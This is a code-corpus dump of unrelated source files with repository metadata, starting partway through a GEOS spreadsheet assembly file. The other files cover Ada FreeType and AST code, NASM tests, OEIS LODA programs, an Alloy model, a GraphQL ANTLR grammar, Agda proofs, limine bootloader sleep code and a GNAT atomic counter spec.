RangeDrawGrid skipGridDraw: ; ; Draw the borders for the range, if any ; tst {byte}ss:locals.CL_data1 ;any borders to draw? jz noBorders ;branch if no borders clr di ;only cells w/data mov ss:locals.CL_params.REP_callback.segment, SEGMENT_CS mov ss:locals.CL_params.REP_callback.offset, offset CellDrawBorders call CallRangeEnum noBorders: ; ; If this is our GState, reset the area mask and color for ; any further drawing. ; mov di, ss:locals.CL_gstate cmp di, ds:[si].SSI_gstate jne noReset ;branch if not our GState mov ax, C_BLACK or (CF_INDEX shl 8) call GrSetAreaColor mov al, SDM_100 call GrSetAreaMask noReset: .leave ret RangeDraw endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CallRangeEnumSelected %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Call RangeEnum() on selected area with current draw flags CALLED BY: ds:si - ptr to Spreadsheet instance ss:bp - ptr to CellLocals: CL_data1 - data word #1 CL_data2 - data word #2 CL_data3 - data word #3 CL_params.REP_callback - fptr to callback di.low - RangeEnumFlags RETURN: none DESTROYED: di PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- eca 5/ 8/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ CallRangeEnumSelected proc far uses ax, bx, cx, dx class SpreadsheetClass locals local CellLocals .enter inherit EC < call ECCheckInstancePtr ;> mov ax, ds:[si].SSI_selected.CR_start.CR_row mov cx, ds:[si].SSI_selected.CR_start.CR_column mov bx, ds:[si].SSI_selected.CR_end.CR_row mov dx, ds:[si].SSI_selected.CR_end.CR_column call CallRangeEnum .leave ret CallRangeEnumSelected endp COMMENT @%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% CallRangeEnum %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% SYNOPSIS: Call RangeEnum() after setting up params CALLED BY: UTILITY PASS: ds:si - instance data (SpreadsheetClass) (ax,cx) (bx,dx) - range of cells to enumerate (r,c) ss:bp - ptr to CellLocals: CL_gstate - handle of GState, if needed CL_drawFlags - SpreadsheetDrawFlags, if needed CL_data1 - data word #1 CL_data2 - data word #2 CL_data3 - data word #3 CL_params.REP_callback - fptr to callback CL_origin - relative draw origin di.low - RangeEnumFlags RETURN: none DESTROYED: di PSEUDO CODE/STRATEGY: KNOWN BUGS/SIDE EFFECTS/IDEAS: REVISION HISTORY: Name Date Description ---- ---- ----------- eca 2/12/91 Initial version %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@ CallRangeEnum proc far uses ax, bx, cx, dx class SpreadsheetClass locals local CellLocals .enter inherit EC < call ECCheckInstancePtr ;> ; ; Store arguments passed in registers ; mov ss:locals.CL_params.REP_bounds.R_left, cx mov ss:locals.CL_params.REP_bounds.R_top, ax mov ss:locals.CL_params.REP_bounds.R_right, dx mov ss:locals.CL_params.REP_bounds.R_bottom, bx mov ss:locals.CL_instanceData.segment, ds mov ss:locals.CL_instanceData.offset, si ; ; Set up other arguments ; mov dx, di ;dl <- RangeEnumFlags mov ss:locals.CL_styleToken, -1 ;no styles set yet ; ; Call RangeEnum() to callback for specified cells ; lea bx, ss:locals.CL_params ;ss:bx <- ptr to args CheckHack <offset SSI_cellParams eq 0 > call RangeEnum .leave ret CallRangeEnum endp DrawCode ends
3-mid/opengl/private/freetype/source/freetype-face.ads
charlie5/lace
20
10728
with freetype.face_Size, freetype.charMap, freeType_C.FT_Face, freeType_C.FT_GlyphSlot, interfaces.C; package freetype.Face -- -- The Face class provides an abstraction layer for the Freetype Face. -- is type Item is tagged private; type View is access all Item'Class; --------- -- Types -- type FT_Encodings is array (Positive range <>) of freeType_C.FT_Encoding; type FT_Encodings_view is access all FT_Encodings; --------- -- Forge -- use Interfaces; package Forge is function to_Face (fontFilePath : in String; precomputeKerning : in Boolean) return Face.item; -- -- Opens and reads a face file. Error is set. function to_Face (pBufferBytes : access C.unsigned_char; -- The in-memory buffer. bufferSizeInBytes : in Positive; -- The length of the buffer in bytes. precomputeKerning : in Boolean) return Face.item; -- -- Read face data from an in-memory buffer. Error is set. procedure destruct (Self : in out Item); -- Disposes of the current Freetype face. end Forge; -------------- -- Attributes -- function attach (Self : access Item; fontFilePath : in String) return Boolean; -- -- Attach auxilliary file to font (e.g., font metrics). -- -- fontFilePath: Auxilliary font file path. -- -- Returns true if file has opened successfully. function attach (Self : access Item; pBufferBytes : access C.unsigned_char; bufferSizeInBytes : in Positive) return Boolean; -- -- Attach auxilliary data to font (e.g., font metrics) from memory. -- -- pBufferBytes: The in-memory buffer. -- bufferSizeInBytes: The length of the buffer in bytes. -- -- Returns true if file has opened successfully. function freetype_Face (Self : in Item) return freeType_C.FT_Face.item; -- -- Get the freetype face object. -- -- Returns a pointer to an FT_Face. function Size (Self : access Item; Size : in Natural; x_Res, y_Res : in Natural) return freetype.face_Size.item; -- -- Sets the char size for the current face. -- This doesn't guarantee that the size was set correctly. Clients should check errors. -- -- Size: The face size in points (1/72 inch). -- x_Res, y_Res: The resolution of the target device. -- -- Returns FTSize object. function CharMapCount (Self : in Item) return Natural; -- -- Get the number of character maps in this face. -- -- Return character map count. function CharMapList (Self : access Item) return FT_Encodings_view; -- -- Get a list of character maps in this face. -- -- Returns a pointer to the first encoding. function KernAdvance (Self : access Item; Index1 : in Natural; Index2 : in Natural) return Vector_3; -- -- Gets the kerning vector between two glyphs. function GlyphCount (Self : in Item) return Natural; -- -- Gets the number of glyphs in the current face. function Glyph (Self : access Item; Index : in freetype.charMap.glyphIndex; load_Flags : in freeType_C.FT_Int) return freeType_C.FT_GlyphSlot.item; function Error (Self : in Item) return freeType_C.FT_Error; -- -- Return the current error code. private use freeType_C; type Float_array is array (C.size_t range <>) of aliased C.c_float; type Float_array_view is access all Float_array; type Item is tagged record ftFace : FT_Face .item; -- The Freetype face. charSize : aliased face_Size.item; -- The size object associated with this face. numGlyphs : Natural; -- The number of glyphs in this face. fontEncodingList : FT_Encodings_view; hasKerningTable : Boolean; -- This face has kerning tables. kerningCache : Float_array_view; -- If this face has kerning tables, we can cache them. Err : FT_Error; -- Current error code. Zero means no error. end record; max_Precomputed : constant := 128; procedure BuildKerningCache (Self : in out Item); end freetype.Face;
source/nodes/program-nodes-while_loop_statements.ads
reznikmm/gela
0
12652
<reponame>reznikmm/gela -- SPDX-FileCopyrightText: 2019 <NAME> <<EMAIL>> -- -- SPDX-License-Identifier: MIT ------------------------------------------------------------- with Program.Elements.Defining_Identifiers; with Program.Lexical_Elements; with Program.Elements.Expressions; with Program.Element_Vectors; with Program.Elements.Identifiers; with Program.Elements.While_Loop_Statements; with Program.Element_Visitors; package Program.Nodes.While_Loop_Statements is pragma Preelaborate; type While_Loop_Statement is new Program.Nodes.Node and Program.Elements.While_Loop_Statements.While_Loop_Statement and Program.Elements.While_Loop_Statements.While_Loop_Statement_Text with private; function Create (Statement_Identifier : Program.Elements.Defining_Identifiers .Defining_Identifier_Access; Colon_Token : Program.Lexical_Elements .Lexical_Element_Access; While_Token : not null Program.Lexical_Elements .Lexical_Element_Access; Condition : not null Program.Elements.Expressions .Expression_Access; Loop_Token : not null Program.Lexical_Elements .Lexical_Element_Access; Statements : not null Program.Element_Vectors .Element_Vector_Access; End_Token : not null Program.Lexical_Elements .Lexical_Element_Access; Loop_Token_2 : not null Program.Lexical_Elements .Lexical_Element_Access; End_Statement_Identifier : Program.Elements.Identifiers.Identifier_Access; Semicolon_Token : not null Program.Lexical_Elements .Lexical_Element_Access) return While_Loop_Statement; type Implicit_While_Loop_Statement is new Program.Nodes.Node and Program.Elements.While_Loop_Statements.While_Loop_Statement with private; function Create (Statement_Identifier : Program.Elements.Defining_Identifiers .Defining_Identifier_Access; Condition : not null Program.Elements.Expressions .Expression_Access; Statements : not null Program.Element_Vectors .Element_Vector_Access; End_Statement_Identifier : Program.Elements.Identifiers.Identifier_Access; Is_Part_Of_Implicit : Boolean := False; Is_Part_Of_Inherited : Boolean := False; Is_Part_Of_Instance : Boolean := False) return Implicit_While_Loop_Statement with Pre => Is_Part_Of_Implicit or Is_Part_Of_Inherited or Is_Part_Of_Instance; private type Base_While_Loop_Statement is abstract new Program.Nodes.Node and Program.Elements.While_Loop_Statements.While_Loop_Statement with record Statement_Identifier : Program.Elements.Defining_Identifiers .Defining_Identifier_Access; Condition : not null Program.Elements.Expressions .Expression_Access; Statements : not null Program.Element_Vectors .Element_Vector_Access; End_Statement_Identifier : Program.Elements.Identifiers .Identifier_Access; end record; procedure Initialize (Self : in out Base_While_Loop_Statement'Class); overriding procedure Visit (Self : not null access Base_While_Loop_Statement; Visitor : in out Program.Element_Visitors.Element_Visitor'Class); overriding function Statement_Identifier (Self : Base_While_Loop_Statement) return Program.Elements.Defining_Identifiers.Defining_Identifier_Access; overriding function Condition (Self : Base_While_Loop_Statement) return not null Program.Elements.Expressions.Expression_Access; overriding function Statements (Self : Base_While_Loop_Statement) return not null Program.Element_Vectors.Element_Vector_Access; overriding function End_Statement_Identifier (Self : Base_While_Loop_Statement) return Program.Elements.Identifiers.Identifier_Access; overriding function Is_While_Loop_Statement (Self : Base_While_Loop_Statement) return Boolean; overriding function Is_Statement (Self : Base_While_Loop_Statement) return Boolean; type While_Loop_Statement is new Base_While_Loop_Statement and Program.Elements.While_Loop_Statements.While_Loop_Statement_Text with record Colon_Token : Program.Lexical_Elements.Lexical_Element_Access; While_Token : not null Program.Lexical_Elements .Lexical_Element_Access; Loop_Token : not null Program.Lexical_Elements .Lexical_Element_Access; End_Token : not null Program.Lexical_Elements .Lexical_Element_Access; Loop_Token_2 : not null Program.Lexical_Elements .Lexical_Element_Access; Semicolon_Token : not null Program.Lexical_Elements .Lexical_Element_Access; end record; overriding function To_While_Loop_Statement_Text (Self : in out While_Loop_Statement) return Program.Elements.While_Loop_Statements .While_Loop_Statement_Text_Access; overriding function Colon_Token (Self : While_Loop_Statement) return Program.Lexical_Elements.Lexical_Element_Access; overriding function While_Token (Self : While_Loop_Statement) return not null Program.Lexical_Elements.Lexical_Element_Access; overriding function Loop_Token (Self : While_Loop_Statement) return not null Program.Lexical_Elements.Lexical_Element_Access; overriding function End_Token (Self : While_Loop_Statement) return not null Program.Lexical_Elements.Lexical_Element_Access; overriding function Loop_Token_2 (Self : While_Loop_Statement) return not null Program.Lexical_Elements.Lexical_Element_Access; overriding function Semicolon_Token (Self : While_Loop_Statement) return not null Program.Lexical_Elements.Lexical_Element_Access; type Implicit_While_Loop_Statement is new Base_While_Loop_Statement with record Is_Part_Of_Implicit : Boolean; Is_Part_Of_Inherited : Boolean; Is_Part_Of_Instance : Boolean; end record; overriding function To_While_Loop_Statement_Text (Self : in out Implicit_While_Loop_Statement) return Program.Elements.While_Loop_Statements .While_Loop_Statement_Text_Access; overriding function Is_Part_Of_Implicit (Self : Implicit_While_Loop_Statement) return Boolean; overriding function Is_Part_Of_Inherited (Self : Implicit_While_Loop_Statement) return Boolean; overriding function Is_Part_Of_Instance (Self : Implicit_While_Loop_Statement) return Boolean; end Program.Nodes.While_Loop_Statements;
test/gather.asm
bitwiseworks/nasm-os2
1
160866
bits 64 VGATHERQPS xmm1, [xmm0 + rsi], xmm2 ; OK VGATHERQPS xmm1, [ymm0 + rsi], xmm2 ; fail: error: invalid effective address VGATHERDPD ymm1, [xmm0 + rsi], ymm2 ; OK VGATHERDPD xmm1, [xmm0 + rsi], xmm2 ; OK VGATHERQPD xmm1, [xmm0 + rsi], xmm2 ; OK VGATHERQPD ymm1, [ymm0 + rsi], ymm2 ; OK VPGATHERQD xmm1, [xmm0 + rsi], xmm2 ; OK VPGATHERQD xmm1, [ymm0 + rsi], xmm2 ; fail: error: invalid effective address VPGATHERDQ ymm1, [xmm0 + rsi], ymm2 ; OK
src/ast_printers.adb
aeszter/lox-spark
6
20012
<filename>src/ast_printers.adb package body Ast_Printers is function Print (The_Expr : Expr'Class) return String is V : Ast_Printer; begin Accept_Visitor (The_Expr, V); return Print (V); end Print; function Print (V : Ast_Printer) return String is begin return To_String (V.Image); end Print; function Print (The_Expr : Binary) return String is begin return "(" & To_String (The_Expr.Get_operator.Lexeme) & " " & Print (Retrieve (The_Expr.Get_left)) & " " & Print (Retrieve (The_Expr.Get_right)) & ")"; end Print; function Print (The_Expr : Grouping) return String is begin return "(group " & Print (Retrieve (The_Expr.Get_expression)) & ")"; end Print; function Print (The_Expr : Float_Literal) return String is begin return Float'Image (The_Expr.Get_value); end Print; function Print (The_Expr : Num_Literal) return String is begin return Integer'Image (The_Expr.Get_value); end Print; function Print (The_Expr : Str_Literal) return String is begin return L_Strings.To_String (The_Expr.Get_value); end Print; function Print (The_Expr : Unary) return String is begin return "(" & To_String (The_Expr.Get_operator.Lexeme) & " " & Print (Retrieve (The_Expr.Get_right)) & ")"; end Print; generic type Expr_Type (<>) is abstract new Expr with private; with function Print (The_Expr : Expr_Type) return String is <>; procedure Visit_Expr (V : in out Ast_Printer; The_Expr : Expr_Type); procedure Visit_Expr (V : in out Ast_Printer; The_Expr : Expr_Type) is function Local_Print (E : Expr_Type) return String renames Print; -- resolve ambiguity Image : constant String := Local_Print (The_Expr); begin V.Image := To_Bounded_String (Image); end Visit_Expr; procedure Do_Visit_Binary_Expr is new Visit_Expr (Binary); overriding procedure visit_Binary_Expr (Self : in out Ast_Printer; The_Expr : Binary) renames Do_Visit_Binary_Expr; procedure Do_Visit_Grouping_Expr is new Visit_Expr (Grouping); overriding procedure visit_Grouping_Expr (Self : in out Ast_Printer; The_Expr : Grouping) renames Do_Visit_Grouping_Expr; procedure Do_Visit_Float_Literal_Expr is new Visit_Expr (Float_Literal); overriding procedure visit_Float_Literal_Expr (Self : in out Ast_Printer; The_Expr : Float_Literal) renames Do_Visit_Float_Literal_Expr; procedure Do_Visit_Num_Literal_Expr is new Visit_Expr (Num_Literal); overriding procedure visit_Num_Literal_Expr (Self : in out Ast_Printer; The_Expr : Num_Literal) renames Do_Visit_Num_Literal_Expr; procedure Do_Visit_str_literal_Expr is new Visit_Expr (Str_Literal); overriding procedure visit_Str_Literal_Expr (Self : in out Ast_Printer; The_Expr : Str_Literal) renames Do_Visit_str_literal_Expr; procedure Do_Visit_unary_Expr is new Visit_Expr (Unary); overriding procedure visit_Unary_Expr (Self : in out Ast_Printer; The_Expr : Unary) renames Do_Visit_unary_Expr; end Ast_Printers;
programs/oeis/130/A130716.asm
neoneye/loda
22
91071
<gh_stars>10-100 ; A130716: a(0)=a(1)=a(2)=1, a(n)=0 for n>2. ; 1,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 trn $0,2 bin $1,$0 mov $0,$1
oeis/142/A142448.asm
neoneye/loda-programs
11
82286
; A142448: Primes congruent to 40 mod 49. ; Submitted by <NAME> ; 89,383,677,971,1069,1559,1657,1951,2441,2539,2833,3323,3617,3911,4597,4793,5087,5381,5479,6067,6263,6361,6949,7243,7537,8419,8713,9007,9203,9497,9791,10477,10771,11261,12143,12241,12437,12829,13417,13613,13711,13907,14593,14887,15083,15377,15671,16063,16553,16651,17239,17729,17827,18121,20963,21061,21649,21943,22433,22531,22727,23021,23609,24001,24197,25373,25471,25667,26647,27431,27529,27823,28019,28411,28607,28901,29587,29881,30469,30763,31253,31547,32233,32429,33311,33409,33703,33997,34487 mov $1,50 mov $2,$0 add $2,2 pow $2,2 lpb $2 sub $1,6 sub $2,1 mov $3,$1 mul $3,2 seq $3,10051 ; Characteristic function of primes: 1 if n is prime, else 0. sub $0,$3 add $1,55 mov $4,$0 max $4,0 cmp $4,$0 mul $2,$4 lpe mov $0,$1 mul $0,2 sub $0,109
examples/gpio/main.adb
ekoeppen/STM32_Generic_Ada_Drivers
1
10883
<reponame>ekoeppen/STM32_Generic_Ada_Drivers with STM32GD.Board; use STM32GD.Board; with HAL; procedure Main is package Button_IRQ is new HAL.Pin_IRQ (Pin => BUTTON); begin Init; LED.Set; Text_IO.Put_Line ("Hello, World!"); STM32GD.Clear_Event; Button_IRQ.Configure_Trigger (Rising => True); loop Text_IO.Put_Line ("Waiting for button..."); Button_IRQ.Wait_For_Trigger; LED.Toggle; Text_IO.Put_Line ("Button pressed"); end loop; end Main;
alloy4fun_models/trashltl/models/11/2zj8uL52gvFbQSKM4.als
Kaixi26/org.alloytools.alloy
0
4916
<gh_stars>0 open main pred id2zj8uL52gvFbQSKM4_prop12 { always all f: File | eventually f in Trash releases f not in Trash } pred __repair { id2zj8uL52gvFbQSKM4_prop12 } check __repair { id2zj8uL52gvFbQSKM4_prop12 <=> prop12o }
src/EntityGraphQL/Grammer/EntityGraphQL.g4
bpasham/EntityGraphQL
0
6992
<filename>src/EntityGraphQL/Grammer/EntityGraphQL.g4 grammar EntityGraphQL; // Core building blocks ID: [a-z_A-Z]+ [a-z_A-Z0-9-]*; DIGIT: [0-9]; STRING_CHARS: [a-zA-Z0-9 \t`~!@#$%^&*()_+={}|\\:\"'\u005B\u005D;<>?,./-]; // identity includes keywords too identity: ID | 'true' | 'false' | 'query' | 'mutation' | 'subscription' | 'fragment' | 'on' | 'and' | 'if' | 'then' | 'else'; int: '-'? DIGIT+; decimal: '-'? DIGIT+ '.' DIGIT+; boolean: 'true' | 'false'; string: '"' ( '"' | ~('\n' | '\r') | STRING_CHARS)*? '"'; null: 'null'; constant: string | int | decimal | boolean | null | identity; // identity should end up being an enum ws: ' ' | '\t' | '\n' | '\r'; // Core building blocks for parsing GQL varArray: '[' type = identity required = '!'? ']'; wsc: comment | ws; // this is a data query (graphQL inspired) # my comment query { entity1 { field1 field2 relation { // field1 field2 } } entity2 { field1 field2 relation { field1 field2 } } } queryKeyword: 'query'; mutationKeyword: 'mutation'; subscriptionKeyword: 'subscription'; gqlCall: '(' ws* gqlarguments = gqlargs ws* ')'; gqlargs: gqlarg (ws* ',' ws* gqlarg)*; gqlTypeDefs: gqlTypeDef (',' ws* gqlTypeDef)*; gqlTypeDef: gqlVar ws* ':' ws* (type = identity | arrayType = varArray) required = '!'? ( ws* '=' ws* defaultValue = constant )?; gqlVar: '$' identity; gqlarg: gqlfield = identity ws* ':' ws* ( gqlvalue = constant | gqlvar = gqlVar ); directiveCall: ws* '@' name = identity (ws* '(' ws* directiveArgs = gqlargs ws* ')')? ws*; aliasType: name = identity ws* ':' ws*; field: alias = aliasType? fieldDef = identity argsCall = gqlCall? ws* directive = directiveCall? ws* select = objectSelection?; fragmentSelect: '...' name = identity; objectSelection: ws* '{' wsc* (field | fragmentSelect) ( (ws* ','? wsc*) (field | fragmentSelect) wsc* )* wsc* '}' wsc*; operationName: operation = identity ('(' (operationArgs = gqlTypeDefs)? ')')?; dataQuery: wsc* (queryKeyword | (queryKeyword ws* operationName))? ws* objectSelection; mutationQuery: wsc* mutationKeyword ws* operationName ws* objectSelection; subscriptionQuery: wsc* subscriptionKeyword ws* operationName ws* objectSelection; gqlFragment: wsc* 'fragment' ws+ fragmentName = identity ws+ 'on' ws+ fragmentType = identity ws* fields=objectSelection; comment: ws* (singleLineDoc | multiLineDoc | ignoreComment) ws*; ignoreComment: '#' ~('\n' | '\r')* ('\n' | '\r' | EOF); multiLineDoc: '"""' ~'"""'* '"""'; singleLineDoc: '"' ~('\n' | '\r')* '"'; graphQL: gqlFragment* (dataQuery | mutationQuery | subscriptionQuery) ( dataQuery | mutationQuery | subscriptionQuery | gqlFragment )*; // This is EntityQuery expression language args: expression (',' ws* expression)*; call: method = identity '(' arguments = args? ')'; callPath: (identity | call) ('.' (identity | call))*; operator: '-' | '+' | '%' | '^' | 'and' | '*' | 'or' | '=' | '<=' | '>=' | '<' | '>' | '/'; expression: 'if ' (' ' | '\t')* test = expression (' ' | '\t')* 'then ' (' ' | '\t')* ifTrue = expression (' ' | '\t')* 'else ' (' ' | '\t')* ifFalse = expression # ifThenElse | test = expression ' '* '?' ' '* ifTrue = expression ' '* ':' ' '* ifFalse = expression #ifThenElseInline | left = expression ' '* op = operator ' '* right = expression # binary | '(' body = expression ')' # expr | callPath # callOrId | constant # const; eqlStart: expression;
part1/induction/*-assoc.agda
akiomik/plfa-solutions
1
15099
<filename>part1/induction/*-assoc.agda module *-assoc where import Relation.Binary.PropositionalEquality as Eq open Eq using (_≡_; cong) open Eq.≡-Reasoning using (begin_; _≡⟨⟩_; step-≡; _∎) open import Data.Nat using (ℕ; zero; suc; _+_; _*_) open import *-distrib-+ using (*-distrib-+) -- 積の結合律 (associativity) *-assoc : ∀ (m n p : ℕ) → (m * n) * p ≡ m * (n * p) *-assoc zero n p = begin (zero * n) * p ≡⟨⟩ zero * p ≡⟨⟩ zero ≡⟨⟩ zero * (n * p) ∎ *-assoc (suc m) n p = begin ((suc m) * n) * p ≡⟨⟩ (n + m * n) * p ≡⟨ *-distrib-+ n (m * n) p ⟩ (n * p) + m * n * p ≡⟨ cong ((n * p) +_) (*-assoc m n p) ⟩ (n * p) + m * (n * p) ≡⟨⟩ (suc m) * (n * p) ∎
oeis/315/A315696.asm
neoneye/loda-programs
11
174676
; A315696: Coordination sequence Gal.5.301.4 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. ; Submitted by <NAME> ; 1,6,12,17,23,27,33,38,44,50,56,62,67,73,77,83,88,94,100,106,112,117,123,127,133,138,144,150,156,162,167,173,177,183,188,194,200,206,212,217,223,227,233,238,244,250,256,262,267,273 mov $1,$0 seq $1,311993 ; Coordination sequence Gal.5.98.2 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings. mov $2,$0 mul $0,6 sub $0,1 mod $0,$1 add $0,1 mov $3,$2 mul $3,4 add $0,$3
src/firmware-tests/Platform/Motor/TurnMotorDummies.asm
pete-restall/Cluck2Sesame-Prototype
1
82491
<reponame>pete-restall/Cluck2Sesame-Prototype #include "Platform.inc" radix decimal TurnMotorDummies code global turnMotorClockwise global turnMotorAntiClockwise global stopMotor global isMotorFullyTurning turnMotorClockwise: turnMotorAntiClockwise: stopMotor: return isMotorFullyTurning: retlw 0 end
stage23/lib/sleep.asm
xlatbptr/limine
1
242975
<filename>stage23/lib/sleep.asm section .realmode int_08_ticks_counter: dd 0 int_08_callback: dd 0 int_08_isr: bits 16 pushf inc dword [cs:int_08_ticks_counter] popf jmp far [cs:int_08_callback] bits 32 extern getchar_internal global _pit_sleep_and_quit_on_keypress _pit_sleep_and_quit_on_keypress: ; Hook int 0x08 mov edx, dword [0x08*4] mov dword [int_08_callback], edx mov edx, int_08_isr mov dword [0x08*4], int_08_isr ; pit_ticks in edx mov edx, dword [esp+4] mov dword [int_08_ticks_counter], 0 ; Save GDT in case BIOS overwrites it sgdt [.gdt] ; Save IDT sidt [.idt] ; Load BIOS IVT lidt [.rm_idt] ; Save non-scratch GPRs push ebx push esi push edi push ebp ; Jump to real mode jmp 0x08:.bits16 .bits16: bits 16 mov ax, 0x10 mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax mov eax, cr0 and al, 0xfe mov cr0, eax jmp 0x00:.cszero .cszero: xor ax, ax mov ds, ax mov es, ax mov fs, ax mov gs, ax mov ss, ax sti .loop: cmp dword [int_08_ticks_counter], edx je .timeout push ecx push edx mov ah, 0x01 xor al, al int 0x16 pop edx pop ecx jz .loop ; on keypress xor ax, ax int 0x16 jmp .done .timeout: xor eax, eax .done: cli ; Restore GDT o32 lgdt [ss:.gdt] ; Restore IDT o32 lidt [ss:.idt] ; Jump back to pmode mov ebx, cr0 or bl, 1 mov cr0, ebx jmp 0x18:.bits32 .bits32: bits 32 mov bx, 0x20 mov ds, bx mov es, bx mov fs, bx mov gs, bx mov ss, bx ; Restore non-scratch GPRs pop ebp pop edi pop esi pop ebx ; Dehook int 0x08 mov edx, dword [int_08_callback] mov dword [0x08*4], edx xor edx, edx mov dl, ah xor ah, ah push eax push edx call getchar_internal pop edx pop edx ret .gdt: dq 0 .idt: dq 0 .rm_idt: dw 0x3ff dd 0
src/gdb/gdb-7.11/gdb/testsuite/gdb.ada/variant_record_packed_array/foo.adb
aps337/unum-sdk
31
27042
-- Copyright 2009-2016 Free Software Foundation, Inc. -- -- This program is free software; you can redistribute it and/or modify -- it under the terms of the GNU General Public License as published by -- the Free Software Foundation; either version 3 of the License, or -- (at your option) any later version. -- -- This program is distributed in the hope that it will be useful, -- but WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -- GNU General Public License for more details. -- -- You should have received a copy of the GNU General Public License -- along with this program. If not, see <http://www.gnu.org/licenses/>. with Pck; use Pck; procedure Foo is type Octal is new Integer range 0 .. 7; type Octal_Array is array (Positive range <>) of Octal; pragma Pack (Octal_Array); type Octal_Buffer (Size : Positive) is record Buffer : Octal_Array (1 .. Size); Length : Integer; end record; My_Buffer : Octal_Buffer (Size => 8); begin My_Buffer.Buffer := (1, 2, 3, 4, 5, 6, 7, 0); My_Buffer.Length := My_Buffer.Size; Do_Nothing (My_Buffer'Address); -- START end Foo;
gcc-gcc-7_3_0-release/gcc/ada/s-atocou.ads
best08618/asylo
7
12514
<gh_stars>1-10 ------------------------------------------------------------------------------ -- -- -- GNAT RUN-TIME COMPONENTS -- -- -- -- S Y S T E M . A T O M I C _ C O U N T E R S -- -- -- -- S p e c -- -- -- -- Copyright (C) 2011-2015, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- As a special exception under Section 7 of GPL version 3, you are granted -- -- additional permissions described in the GCC Runtime Library Exception, -- -- version 3.1, as published by the Free Software Foundation. -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ -- This package provides atomic counter on platforms where it is supported: -- - all Alpha platforms -- - all ia64 platforms -- - all PowerPC platforms -- - all SPARC V9 platforms -- - all x86 platforms -- - all x86_64 platforms package System.Atomic_Counters is pragma Pure; pragma Preelaborate; type Atomic_Counter is limited private; -- Type for atomic counter objects. Note, initial value of the counter is -- one. This allows using an atomic counter as member of record types when -- object of these types are created at library level in preelaborable -- compilation units. -- -- Atomic_Counter is declared as private limited type to provide highest -- level of protection from unexpected use. All available operations are -- declared below, and this set should be as small as possible. -- Increment/Decrement operations for this type raise Program_Error on -- platforms not supporting the atomic primitives. procedure Increment (Item : in out Atomic_Counter); pragma Inline_Always (Increment); -- Increments value of atomic counter. function Decrement (Item : in out Atomic_Counter) return Boolean; pragma Inline_Always (Decrement); -- Decrements value of atomic counter, returns True when value reach zero function Is_One (Item : Atomic_Counter) return Boolean; pragma Inline_Always (Is_One); -- Returns True when value of the atomic counter is one procedure Initialize (Item : out Atomic_Counter); pragma Inline_Always (Initialize); -- Initialize counter by setting its value to one. This subprogram is -- intended to be used in special cases when the counter object cannot be -- initialized in standard way. type Atomic_Unsigned is mod 2 ** 32 with Default_Value => 0, Atomic; -- Modular compatible atomic unsigned type. -- Increment/Decrement operations for this type are atomic only on -- supported platforms. See top of the file. procedure Increment (Item : aliased in out Atomic_Unsigned) with Inline_Always; -- Increments value of atomic counter function Decrement (Item : aliased in out Atomic_Unsigned) return Boolean with Inline_Always; procedure Decrement (Item : aliased in out Atomic_Unsigned) with Inline_Always; -- Decrements value of atomic counter -- The "+" and "-" abstract routine provided below to disable BT := BT + 1 -- constructions. function "+" (Left, Right : Atomic_Unsigned) return Atomic_Unsigned is abstract; function "-" (Left, Right : Atomic_Unsigned) return Atomic_Unsigned is abstract; private type Atomic_Counter is record Value : aliased Atomic_Unsigned := 1; pragma Atomic (Value); end record; end System.Atomic_Counters;
Transynther/x86/_processed/NONE/_xt_sm_/i3-7100_9_0x84_notsx.log_21829_219.asm
ljhsiun2/medusa
9
241985
